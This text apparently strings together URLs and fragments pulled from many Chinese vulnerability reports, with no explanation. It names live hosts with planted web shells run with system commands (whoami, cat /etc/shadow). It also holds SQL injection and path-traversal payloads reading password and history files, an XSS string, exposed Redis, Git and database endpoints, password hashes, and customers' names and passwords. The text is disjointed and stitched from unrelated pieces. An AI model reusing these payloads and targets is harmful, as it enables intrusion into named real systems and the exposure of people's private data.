http://e.dangdang.com/media/api2.go?deviceSerialNo=8D47C214-7A36-465C-B722-F6D35E578467&clientOs=iPhone%2520OS7.1.1&columnType=all_aa*&platform=2&deviceType=iphone&isFull=1&channelId=10020&clientVersionNo=5.5.0&returnType=json&end=20&serverVersionNo=1.0&token=0d50506475bcaea555e6c0d9e933115e&macAddr=020000000000&orderSource=30000&fromPlatform=101&action=column&platformSource=DDDS-P&permanentId=20160416115048424116807875249950073&resolution=640x960&start=0 https://220.181.1.131/ https://**.**.**.** http://comm.dangdang.com/parents/index.php?mode=ajax&sort_type=creation_date&ajax_type=img_list&pageindex=1&_=1460665788473 https://appi.fengjr.com/app/api/v1/home/ios?v=1.5 http://**.**.**/sdp/zfjxywk/guide.domethod=busEntry&configIIDD=C13AEF7B6A0E40DF80ACFD2A4A4D55E5%27%20and%201%3d2%20and%20%27a%27%3d%27a_ http://www.himofi.com/ http://m.himofi.com/v3/cp/users/login http://m.himofi.com/v3/cp/upload/merchant/2016/04/16/57120841d30f0.php https://mail.ahic.com.cn http://221.123.132.16/ jdbc:oracle:thin:@**.**.**.**:1521:portal1 http://122.227.248.254:8080/applications/qsweb/login.jsp encap:Ethernet AA:05:0D addr:172.17.167.8 Bcast:172.17.167.255 
Mask:255.255.255.0 feaa:50d/64 Scope:Link MTU:1500 packets:109947766 packets:56767625 txqueuelen:1000 http://**.**.**.**/bugs/wooyun-2016-0196866 http://**.**.**.** http://**.**.**.**/buylist.php http://**.**.**.**/buylist.php http://**.**.**.**/package.php?action=add http://**.**.**.** http://**.**.**.**/index.php/admin/count/visitors http://**.**.**.**/index.php/admin/count/onlinepla http://**.**.**.**/login.php http://**.**.**.**/index.php http://**.**.**.**/admin/index/index http://**.**.**.**/index.php http://**.**.**.**/ https://**.**.**.**/myoneray/Test/blob/3923948a2778791571390631cc242530c21ddc23/data-center/src/main/resources/jdbc.properties https://**.**.**.**/tianqf/tianqf.**.**.**.**/blob/5f2fc108da31837fbadc7cc047c2d14a8ad70c80/_posts/2015-11-14-install-and-setup-redmine.html http://**.**.**.**/bugs/wooyun-2016-0196266 http://180.149.134.22/stats/2013_10_14_access_log http://live800.wan.renren.com http://**.**.**.**/wjmm/index.html http://**.**.**.**/validtmp/validtmp_changPassword.do?param._se_securityCode=668EB0FFD7A8BB548B846B65D40DC594 http://online.yeepay.com http://**.**.**.**/ http://**.**.**.**/ http://m.dangbei.com/wap-view-728.html http://219.143.219.77:8001,http://219.143.219.74:8001 http://shop.znds.com/ http://203.187.184.7/mty/logon.jsp http://203.187.184.7/mty/logon.jsp http://mashifu.astro.ifeng.com/ https://mail.midea.com https://vpn.midea.com/ https://sp.midea.com/ https://oa.kysec.cn/login/Login.jsp?logintype=1 https://oa.kysec.cn/services/MobileService SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/ xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/ xmlns:xsd="http://www.w3.org/1999/XMLSchema xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance xmlns:m0="http://tempuri.org/ xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/ xmlns:urn="webservices.services.weaver.com.cn xmlns:urn2="http://workflow.webservices.mobile.weaver SOAP-ENV:Header/ SOAP-ENV:Body urn:checkUserLogin urn:in0 urn:in0 urn:in1 
urn:in1 urn:in2 urn:in2 urn:checkUserLogin SOAP-ENV:Body SOAP-ENV:Envelope http://www.4008118228.cn/ http://www.4008118228.cn/uddiexplorer/2ss.jsp?pwd=023&i=ls http://www.4008118228.cn/uddiexplorer/2ss.jsp?pwd=023&i=/sbin/ifconfig http://www.cninsure.net ftp://219.141.188.8 ftp://219.141.188.8/data/ https://www.bohaitrust.com/ https://www.bohaitrust.com/Journal/favors/cid/4?newid=107 http://**.**.**/gzxmbj/XMBJ/Index.aspx jdbc:oracle:thin:@**.**.**.**:1521:js12366ww http://103.248.102.13/ http://user.iyiyun.com http://user.iyiyun.com/Login/Index/checkUserNameAjax?userName=admin http://himall.hisense.com/assets/common/uploadify/ http://218.58.78.151/new_theme/common/uploadify/ http://218.58.78.151/new_theme/common/uploadify/uploadify.php http://www.yrib.com/ http://www.yrib.com/richsafe_getNewsDetailById.action?id=10 https://**.**.**.**/davidhaha6/GradleTestA/blob/9226c5dfc335b74803c7468c22dc624b10cf3329/modules/m1/src/main/resources/application.conf http://**.**.**.** https://openapi.youku.com/v2/oauth2/authorize?client_id=a99157586955e228&response_type=code&redirect_uri=http://shop.youku.com/i/login/youku/callback&state= http://122.112.12.135//utility/convert/index.php redis://122.112.12.155:6400 redis://122.112.12.155:6401 redis://122.112.12.155:6402 redis://122.112.12.155:6405 redis://122.112.12.155:6403 redis://122.112.12.155:6404 http://drops.wooyun.org/papers/10546 http://www.oschina.net/news/67975/redis-defect?from=mail-notify https://124.127.98.179 https://124.127.98.173 https://124.127.98.155 https://124.127.98.158 https://vpn.sinopharm.com/ http://mdm.sinopharm.com http://mdm.sinopharm.com//uapws/service/nc.itf.ses.inittool.PortalSESInitToolService http://oamob.cninsure.net/common/cvar/CExec.jsp http://www.zxcn.com:8001/Default.aspx http://219.141.188.35/biportal http://lzguat.cninsure.net:9090/ http://202.108.145.241/phpMyAdmin/ http://m.api.lianjia.com 
http://m.api.lianjia.com/web/ershoufang/sidebar?callback=jQuery1111010487171867862344_1460815277788&cityId=320100&id=320100&uuid=62bf4246-294e-457f-9790-8bc572c0886f&ucid=&type=city&_=1460815277789 https://10.210.x.x/login.html http://**.**.**.**/ http://android.myapp.com/myapp/detail.htm?apkName=com.condenast.gq24 http://103.37.152.57/ http://mobile.zhushou.sogou.com/android/serverconfig.html?iv=51&uid=f7e6de65c1846a70c7411b1c141591e8&vn=5&channel=zhuzhan&sogouid=5be7dec65e2011b9575759714b0d1930&stoken==IhTefovaz0ppdInTQxRlnQ&cellid=gsm_460_00_9763_3922&sc=0 http://mobile.zhushou.sogou.com/android/serverconfig.html?iv=51&uid=f7e6de65c1846a70c7411b1c141591e8&vn=5%27XOR%28if%28now%28%29=sysdate%28%29,sleep%283%29,0%29%29OR%27&channel=zhuzhan&sogouid=5be7dec65e2011b9575759714b0d1930&stoken==IhTefovaz0ppdInTQxRlnQ&cellid=gsm_460_00_9763_3922&sc=0 http://wx.ah.huatu.com/ http://wx.ah.huatu.com/Uploads/Picture/2016-04-18/5714a7c9330a4.php http://**.**.**.**/bugs/wooyun-2010-0178322为例: soapenv:Envelope xmlns:soapenv="http://**.**.**.**/soap/envelope/ xmlns:icur="http://crm.bd.itf.nc/ICurrtypeExportToCrmService soapenv:Header/ soapenv:Body icur:exportCurrtypeToCrm http://**.**.**.**/login.jsp http://**.**.**.**/live800/ http://**.**.**.**/live800/chatClient/preChatAskl.jsp?companyID=1 http://**.**.**.**/live800/ http://**.**.**.**/live800/chatClient/preChatAskl.jsp?companyID=1 http://**.**.**.**/live800/ http://**.**.**.**/live800/chatClient/preChatAskl.jsp?companyID=1 http://**.**.**.**/live800/ http://**.**.**.**/live800/ http://**.**.**.**/live/ http://**.**.**.**/live800/ http://**.**.**.**/live800/ http://**.**.**.**/live800/ http://www.uhuibao.com/yh/detail/?ytid=0&suid=261&yid=1 http://www.uhuibao.com/index.php/?s=1 http://www.uhuibao.com/card/index/?chl=web http://www.o2osl.com/OWebsite/product.html http://mcenter.o2osl.com:8888/home/Backstage/homePage http://trends.baidu.com/tour/ajax/scenic inurl:password 
http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1613147&Contract_mf=%E9%BB%84%E6%99%B6%E6%99%B6&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1743081&Contract_mf=%E9%99%88%E5%9B%BD%E5%BC%BA&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1733822&Contract_mf=%E6%98%8E%E6%98%9F&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1742984&Contract_mf=%E5%BA%84%E5%AE%B6%E7%90%A2&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1547220&Contract_mf=%E8%B5%B5%E5%91%88%E5%8D%8E&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1643816&Contract_mf=%E6%9D%8E%E6%A2%A6%E5%9C%86&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1741851&Contract_mf=%E5%BC%A0%E6%A1%82%E8%8A%AC&Contract_Password=666666 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1743081&Contract_mf=%E9%99%88%E5%9B%BD%E5%BC%BA&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1709255&Contract_mf=%E9%87%91%E5%BF%97%E5%9B%BD&Contract_Password=000000 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1668634&Contract_mf=%E5%BC%A0%E4%BA%AE%27and%271%27=%271&Contract_Password=123456 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1706061&Contract_mf=%E6%9F%B3%E4%BC%9F&Contract_Password=000000 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1613147&Contract_mf=%E9%BB%84%E6%99%B6%E6%99%B6&Contract_Password=111111 http://www.**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1674630&Contract_mf=%E5%BC%A0%E5%BF%97%E5%85%B4&Contract_Password=000000 
http://v6.bang.weibo.com/aj/gongyi/rank?ajwvr=6&__rnd=1460968054871 http://v6.bang.weibo.com http://bbs.showboom.cn/utility/convert/index.php http://wooyun.org/bugs/wooyun-2013-045611 http://mall.showboom.cn/ http://mall.showboom.cn/wuyun.php http://active.zol.com.cn/08active/admin/326gs/operate.php?id=8946&del=1 http://passport.gq.com.cn/front/apiconnect/thirdAuthor http://passport.gq.com.cn/front/apiconnect/thirdAuthor https://shanghai.602.com/svn/ http://**.**.**.**/ http://z.easou.com/show.m?esid=zxHvHNlffsZ&p=1&pn=1&q=&sr=192.168.1.10&wver=c# www.10jqka.com.cn www.10jqka.com.cn R7UQ9Z1:16827:0:99999:7 http://weibo.com/ttarticle/p/show?id=2309403959482995611795 http://bbs.appcan.cn//config/config_ucenter.php.bak http://edu.appcan.cn/train_detail_new.html?id=498 http://edu.appcan.cn/train_outline1.html?train_place=%3Cscript%3Ealert%281%29%3C/script%3E site:appcan.cn inurl:login http://siteadm.appcan.cn/Daemon/appshow/listinterfaceById?status=1&typeid=82&rows=8&callback=jQuery19103505221238365238_1461031756517&_=1461031756518 http://siteadm.appcan/Daemon http://mail.west263.com/login.php?Cmd=login localhost:sqlmap http://mail.west263.com/login.php?Cmd=login http://sqlmap.org http://crm.southernfund.com:8088/CRMWebService.asmx?WSDL http://webservice.sinitek.com/sendmessagetoapns com:8088 http://fanyi.youdao.com/WebpageTranslate?keyfrom=webfanyi.top&url=http%3A%2F%2Fwww.wooyun.org&type=EN2ZH_CN https://github.com/fuhongliang/api.crc360.cn http://shenzhou.medlive.cn/ https://codeload.github.com/luoqiboy/first_program/ http://if.uhuibao.com:9090/interface/askApp.action http://pay.uhuibao.com:8083/ http://pay.uhuibao.com:8083/SunspeedyPayment/VloginUser.action com:8083 http://**.**.**.**:80/flight/view_xz.aspx?id=9 
http://www.xueyazhushou.com/api/do_bbs.php?Action=getInfoContent&info_id=598&pages=1&nums=20&app=0&platform=android&systemVer=5.1&version=2.6.1&app_ver=2.6.1&imei=867556021834224&device_id=867556021834224&mac=ec%3A5a%3A86%3Aff%3A35%3A6f&secureId=f671d23b5fac5957&installId=1460978536986&phoneType=8681-A01_by_QiKU&vendor=baidu http://crew.9air.com:8080/9airweb/allUserMap.action http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/etc/shadow http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=whoami http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=ls%20/ http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/history.log sjc.hubu.edu.cn/sjxx_detail.aspid=358 http://qupai.wandamoviepark.com/ http://114.251.127.80/names.nsf/$users http://101.198.161.130:9200/ http://101.198.161.130:9200/_plugin/head/ http://101.198.161.130:9200/_nodes http://wechat2.cc.letv.com/ http://wechat2.cc.letv.com/EliteWebChat/sessionTranscript.do?sessionId=2504969 http://tj.newsesf.leju.com:80/im_ajax.php?action=get_agentinfo_byuid&t=1460826734181&uid=8156628 http://www.jingzhengu.com/Resources/ajax/Userinfo.ashx www.jingzhengu.com http://www.jingzhengu.com http://ys.zbj.com/ http://tiyan.baidu.com/static/img.php?s=15,15&n=icon-info.png http://tiyan.baidu.com/static/img.php?s=15,15&n=/icon-info.png http://tiyan.baidu.com/static/img.php?s=15,15&n=./icon-info.png http://tiyan.baidu.com/static/img.php?s=15,15&n=../icon-info.png http://tiyan.baidu.com/static/img.php?s=15,15&n=....//icon-info.png http://tiyan.baidu.com/static/img.php?s=16,40&n=....//....//index.php%00.png http://tiyan.baidu.com/static/img.php?s=16,40&n=....//....//....//....//....//....//....//home/bae/bae/phplib/config/BaeMysqlConfigure.class.php%00.png读取数据库连接 http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/get-point-view-list?limit=1 http://house.leju.com/ck/search-4/?hy91=0&keyword=1 http://www.wandahotels.com/phpsso_server/存在PHP默认登录后台 www.wandahotels.com http://www.wandahotels.com com:8080 
com:8080 http://101.198.161.117/ jdbc:sqlserver://192.168.1.13:1433 classpath:/ibatis/sqlMap-config-sqlserver.xml classpath:/ibatis/sqlserver/sqlmap/*.xml IP:116.31.80.147:443 IP:116.31.80.144:443 cn:40056 http://101.198.161.39:6379 www.peaksport.com/candidate.phpsubject=%E5%8C%BA%E5%9F%9F%E7%BB%8F%E7%90%86&rid=200 http://ht.letv.cn/,发现各种系统 https://github.com/evilbinary86/MarkdownNote/blob/bf8cda7564d169250da146f25084702a2d40f49a/%E5%8D%8E%E6%B6%A6%E5%B7%A5%E4%BD%9C/%E6%94%AF%E4%BB%98%E5%8D%95%E4%B8%8A%E4%BC%A0%E4%B8%9A%E5%8A%A1/%E7%AC%94%E8%AE%B0.md http://www.crvbest.com.cn/OurHome http://android.myapp.com/myapp/detail.htm?apkName=com.adtech.xnclient http://211.151.3.108/index http://i.camera360.com/oalogin.html?action=logout&redirectUrl=http://support.camera360.com/www/ https://hao123.camera360.com/ http://work.ems.com.cn http://f1.hupu.com/racepedia/rumors_arch.php?fatherclassid=831&str=fl https://icrew.csair.com可下载南航内部使用的APP“客舱移动” https://icrew.csair.com/mobile/flightScheduled_fast.action?empId=182473 http://sso.treebear.cn/user/ssologin.htm?sid=treebear http://shop.treebear.cn/user.php http://vip.witown.cn http://42.121.192.49:8080/applications.html http://product.aili.com//phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://hzp.aili.com//phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://brand.aili.com//phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://**.**.**/bugs/wooyun-2010-0176803_ https://contact.mercedes-benz.com.cn/brochure/step2/?model=16&language=cn https://etrade.10jqka.com.cn http://183.131.12.195/ 
..logs/cso.access.log..main......p*..............8................q.......t......................................h......................................................................./usr/local/nginx/logs/cso.access.log.error_log..logs/cso.error.log..notice...............t....................................................................../usr/local/nginx/logs/cso.error.log.root../var/www/cso/www..location.m\\.html$.de`|...............+......8-......./......................./.......0 http://60.28.216.70/ http://60.28.216.70/log.php http://v.2345.com/moviecore/server/variety/index.php?act=ajaxMoreEpisode&api=-1%27%20or%201=3--%20&ctl=newDetail&id=18363&month=0&nowTotal=14&time=1461014443020&timeStamp=1461014443020&title=%BB%B6%C0%D6%CF%B2%BE%E7%C8%CB&total=14&year=2015 http://v.2345.com/moviecore/server/variety/index.php?act=ajaxMoreEpisode&api=-1%27%20or%201=1--%20&ctl=newDetail&id=18363&month=0&nowTotal=14&time=1461014443020&timeStamp=1461014443020&title=%BB%B6%C0%D6%CF%B2%BE%E7%C8%CB&total=14&year=2015 http://bdpp.leju.com/test.php https://**.**.**.**/c445156840/GESWEB2/ https://**.**.**.**/c445156840/GESWEB2/blob/5b800da4d55c6fac6f31697e8fab7755cf706d5d/src/main/resources/config.ini jdbc:oracle:thin:@**.**.**.**:9090:ora10g http://t.hexin.cn/dlxhtml/quick_query.php http://122.228.73.217:8081/../../../../../../../../etc/shadow http://plus.aili.com http://plus.aili.com/topicLab/index.php?m=user&a=topicVote&callback=jsonp1460891080351&contentid=1793&type=clothv3_index&dosubmit=1&r=0.7601377370301634 http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/root/.bash_history http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/usr/local/nginx/conf/ngx_passwd zhangyong:2RsUTTsvOmOdA zengqh:DunTiVFkBxz7A http://blog.10jqka.com.cn/blogerTalk.php?action=blogerTalk&userid=84049333 http://test.wenji99.com http://test.wenji99.com/cate_show_ajax.php?oper=ajax&call=get_cate http://moni.10jqka.com.cn http://cms.ubernihao.com http://cms.ubernihao.com 
http://cms.ubernihao.com http://cms.ubernihao.com/ http://cms.ubernihao.com/login.html http://cms.ubernihao.com/login.html http://cms.ubernihao.com/.git/config http://cms.ubernihao.com/.git/config http://cms.ubernihao.com http://cms.ubernihao.com/ http://cms.ubernihao.com http://cms.ubernihao.com/.git/config http://cms.ubernihao.com/login.html http://cms.ubernihao.com/.git/config net:muzhibuluo/uber_cms_v2.git http://code.ubernihao.com/logs/ http://app.huawei.com/icasewww/eweb/admin/login.jsp http://app.huawei.com/icasewww/eweb/admin/upload.jsp?id=11&d_viewmode=list&dir=eweb%2Fskin icasewwwEAR-edition1.6.ear/icaseWar.war http://p.aijee.cn/CApp1_2_4/GetCityDomain http://wiki.ename.cn/doc/search https://github.com/wxlong1985/baoxian https://github.com/wxlong1985/baoxian/blob/ce2a5bb30610653b2588bd4db7c2e0f750567743/src/main/resources/deploy.properties jdbc:mysql://120.27.160.138/baoxian?useUnicode=true&characterEncoding=UTF-8 http://**.**.**.**/bugs/wooyun-2016-0183263,想起来这家券商也是万户的OA,发现果然也存在注入 redis://60.28.244.38:6300 redis://60.28.244.38:6301 redis://60.28.244.141:6301 redis://60.28.244.141:6300 redis://60.28.244.140:6300 redis://60.28.244.140:6301 http://180.153.190.79:8880/phpMyAdmin/ www.west.cn/services/server/serverdiy.asp http://**.**.**.**/ http://jkwin.com.cn/solr/#/ http://**.**.**.**:8080/km/login.dhtml http://www.rapoo.cn/ http://ros.rapoo.cn:8090 http://ros.rapoo.cn:8090/Default.aspx http://xq80.hubu.edu.cn http://flashcms.10jqka.com.cn/ http://www.coolyun.com/guide/weather.html http://mobile.zhushou.sogou.com/android/topicdetail.html?iv=36&topicid=1637&start=0&limit=30&uid=f7e6de65c1846a70c7411b1c141591e8&vn=5.1.2&channel=zhuzhan&sogouid=5be7dec65e2011b9575759714b0d1930&stoken==IhTefovaz0ppdInTQxRlnQ&cellid=gsm_460_00_9763_3922&sc=0 http://mobile.zhushou.sogou.com/android/topicdetail.html?iv=36&topicid=1637 http://mobile.zhushou.sogou.com/android/topicdetail.html?iv=36&topicid=1637 http://wooyun.org/bugs/wooyun-2013-021889 
http://wooyun.org/bugs/wooyun-2013-021889 http://183.131.12.181:8601这个地址上发现是java http://baike.sogou.com/ http://wapyd.hexin.cn/ http://wapyd.hexin.cn/dlarea/dl_model.php?bid=1&bname=%E9%80%9A%E7%94%A8%E5%8C%BA&mid=1902&mname=1.5%E7%B3%BB%E7%BB%9F%E5%8F%8A%E4%BB%A5%E4%B8%8A&from= http://wapdx.hexin.cn/lhj/dl_pt.php?ptid=765&ptname=java&verid=42&vername=%E9%A2%86%E8%88%AA%E5%AE%B6 http://hntel.hexin.cn/hntelxhtml/dlModelFile.php?brand=3g http://www.lvmama.com/guide/ajax/api.php?action=getPlaceOrg&placeid=79 http://test.hexin.cn/htdocs.tgz http://test.hexin.cn/htdocs/eq/eqadmin/interface/wxloginprompt.php http://180.153.190.79:8880/uc_server/admin.php http://**.**.**.**:8080 http://training.sfchina.bmw.com.cn/jsp/home/login.jsp http://221.122.80.105/help.jspx jdbc:odbc:lcms jdbc:oracle:thin:@192.168.0.152:1521:orcl http://www.app-echo.com/index/login主站登陆没有任何限制 http://**.**.**.**:999/ http://gzxijiu.cn:82/Service1.asmx http://tempuri.org/FCCodeTracert http://admin.rapoo.cn/log.txt http://rpw.rapoo.cn/rapoo.zip http://**.**.**.**:9012/login.action http://**.**.**.**:9006/login.action http://**.**.**.**:9015/weblogin.action http://**.**.**.**:9012/login.action http://**.**.**.**:9006/login.action http://**.**.**.**:9010/amsg!feecdrlist.action http://**.**.**.**:9012/login.action http://**.**.**.**:8081/axis2/axis2-admin/login http://**.**.**.**:8081/axis2/services/Cat/exec?cmd=whoami http://**.**.**.**:8081/point/f.jsp http://api.lespark.us/feedback_view?&last_id=57144342c2fa5169c09fa132 http://**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1741851&Contract_mf=%E5%BC%A0%E6%A1%82%E8%8A%AC&Contract_Password=666666 https://mail.jj-inn.com/owa/ http://tuis.papa91.com/?aid=NQZFok http://**.**.**.**/uploadFile/loadFeatureImgDataByFileName.do?fileName=d12da195-4e90-486d-ba9e-be00e7383263_20160325022009209.jpg http://**.**.**.**.la/show.php?id=6 https://sslvpn.ganji.com http://219.139.25.12/loginInit.system http://219.139.25.11/loginInit.system 
http://219.139.25.4/loginInit.system http://219.139.25.12/uddiexplorer/ss.jsp http://219.139.25.12/uddiexplorer/out.jsp http://202.108.43.241:8080/.svn/entries http://123.126.34.179:7002/login http://123.126.34.179:7002/cmd.jsp http://www.jscpel.com:9090/JSCNPL_TMS_TEST/login.action root:/roo***** bin:/sbi***** sbin:/sb***** adm:/sb***** lpd:/s***** sbin:/***** wn:/sbin:/s***** sbin:/***** uucp:/***** tor:/root:/***** gopher:/***** ftp:/s***** body:/:/s***** bus:/:/***** owner:/d***** abrt:/sb***** daemon:/:/***** ntp:/sbi***** SSH:/var/empty***** aemon:/:/s***** User:/***** ver:/var/lib/ng***** User:/var/lib***** User:/var/li***** www:/***** db:6***** cd:13***** http://pay.mojing.cn:80/api/getvideo.php?version=3.00.1221.2211 http://box.915.com/api/dataapi.php?devicecode=564443CC-9189-42C1-9CC9-0922116AD5C4&imei=&imsi=&iosflag=2&languageid=1&ordercode=1&packetid=1&page=1&pagesize=1&platform=1&protocol=100004&resolution=640*1136&screensize=320*568&sessionid=×tamp=1461386243&token=32ed04e2e45b2729a35e5d10b5311635&&userid=18783&versioncode=1.3.1&versionid=8 https://mail.cib-fund.com.cn/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2fmail.cib-fund.com.cn%2fowa http://mj.cms.mojing.cn/api/v1/vr_market/source_search.php?page=1&source_type=3&title=aaaa&version=20151016 http://life.stockstar.com/config.ini http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/system_main.do http://**.**.**.**/system_getVaildImg.do http://trust.10jqka.com.cn/xtcp/_0_0_0_0_all_yqsyl_desc_1.shtml http://db.duowan.com/zx2/skill.php?c=1 http://db.duowan.com/zx2/skill.php?c=1 http://e.dangdang.com/rank_detail_page.html http://download.egfbank.com.cn/app1.html cn:8080 http://mobile2.10jqka.com.cn/interface/query_account.php?account=admin&password=¬check=1 https://222.66.119.19/ http://cats.10jqka.com.cn/cat http://pos.10jqka.com.cn/center/center/myupload/uploaderid/235070423 http://**.**.**.**/%C0%AE/WEB-INF/webContext.xml http://localhost:8002/businessFacade.service"/ 
http://localhost:9001/coreInterFace.action http://mf.m.leju.com/v4/recommend/news.json?uuid=9b4b25ba3eeef889915f2411baa2fb00680e0bb6&system=iPhone%20OS9.3.1&idfa=564443CC-9189-42C1-9CC9-0922116AD5C4&gather_x=114.040960&time=1461481713&source=appStore&os=ios&gather_y=22.611311&city=sh&openuuid=196510DC30782F568F1853FF4C20665F&page=1&appkey=2408231234&model=iPhone&v=4.0 http://vaserviece.10jqka.com.cn/mobilecfxf/contenajax.php?path=test.txt http://vaserviece.10jqka.com.cn/mobilecfxf/contenajax.php?path=/etc/passwd http://m.leju.com/touch/esf/bj?ln=ljmf_h5&source=ios&s=yd_kdlj https://github.com/www1350/firstob/blob/cb501378df1718f54df7dbefc1c4ca577c334cbe/src/main/resources/conf/mail.properties https://mail.myhexin.com/src/webmail.php https://218.108.90.228:10089/hexin-crm http://hcp.xinnet.com/ http://218.107.6.142:7777/ encap:Ethernet F8:BC:12:4E:E8:34 addr:10.45.47.91 Bcast:10.45.47.255 Mask:255.255.255.0 fabc:12ff:fe4e:e834/64 Scope:Link MTU:1500 packets:1187328693 packets:1200637718 txqueuelen:1000 https://appserv.273.cn/1.3/search.getSaleDetail?_api_time=1461506128&_api_key=fa1f58046f169f08d3ebf086a11399e4&_api_token=ObudatLb7UdJcaOUfxOQKM6NszavuNMsJXRkJYiXZ%2BAup64TgIbKnvC%2Fb9rh7mjw&_app_source=3&_app_type=2&_app_version=3.2.0&id=18020272 http://mall.haval.com.cn/carload/spuSelector.html http://cip.dongfeng-nissan.com.cn https://etrade.cryuantafund.com/ http://t.docin.com/players/.ssh/known_hosts http://event8.wanmei.com/zxafoulstart/userlist.do http://testm.10jqka.com.cn/pay/pad_release.php?counturl=http://vaserviece.10jqka.com.cn/macd/index.php?module=count&goto=nwnd&op=goldpay¶m=macd&platform=ipad&s_id=206&source=macdd_gbuy1 http://oa.winxuan.com/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=1 http://oa.winxuan.com/ServiceAction/com.velcro http://mall.moji.com www5.53kf.com http://www5.53kf.com 
https://appserv.273.cn/1.3/subscribe.updateClientId/?_api_time=1461545212.897876&_api_key=8a7f95774b1ce149fda1025298c310d9&_api_token=5UyTSYg9rhZy%2FkyyJPJTXhD88e9whsqPx9CobSuqNsAk0gaSp3Q7CyQgcq0NVYX6&_api_debug=1&_app_source=2&_app_type=2&_app_version=3.2.2 http://b2b.exijiu.cn/B2B/ele-business/Psgl/login.aspx http://b2b.exijiu.cn http://baike.baidu.com/view/12769298.htm http://activity.mafengwo.cn http://activity.mafengwo.cn/t/travel_mdd_top/v1/list?aid=1 http://gzxijiu.cn:100/faxserver/ http://gzxijiu.cn:100/faxserver/JSActionServlet https://gmc.china-moutai.com/vpnweb/index.php?para=index http://www.wooyun.org/corps/%E7%BD%91%E5%BA%B7%E7%A7%91%E6%8A%80 http://tj.newsesf.leju.com/网站存在注入。 http://shop.xiamenair.com/prolist.aspx?k=1&n941808=v923726 http://gm.7.youzu.com/ http://live800.wan.renren.com/ http://gongyi.wanmei.com/ http://haoma.leju.com/api/user/get_friend_list.json http://**.**.**.** http://kh.10jqka.com.cn/card/index.php?action=getCardDetail&card_id=690331168%20or%207572%3d7573&callback=jsonp1 http://u8.qh168.com.cn:8080/acenter/admin.action https://sell.xiaoenai.net/order/list/search_all?name=A&phone=&id=&product_id= https://streetadm.xiaoenai.net/productions/list/search_all?id=10&seller_id=&title=&seller_name=&scene= http://chat.house.sina.com.cn/ http://chat.house.sina.com.cn/index.php/admin/room/index?cityid=-1&title=&id=&begintime=&endtime=&realname=&template= supports.house.sina.com.cn/chat http://chat.house.sina.com.cn的cookies就可以进去 http://supports.house.sina.com.cn site:maidou.com http://maidou.com/file/download.do?fileId=30038 http://10.15.3.96:8080 http://222.178.225.36:8083/SMS/ http://222.178.225.36:8083/SMS/freeWill.json http://**.**.**/_ http://**.**.**/job/%E4%BA%92%E8%81%94%E7%BD%91%E6%94%AF%E4%BB%98%E7%B3%BB%E7%BB%9F/ws/api/target/classes/com/lakala/sh/front/mpos/api/MPosRetCode.class/*view*/_ http://**.**.**/ http://**.**.**/script_ http://ywct.xiaoyule.cn/user/login http://event8.wanmei.com/zhuxian/zxdiamondlove/zxzuanshi!list.action 
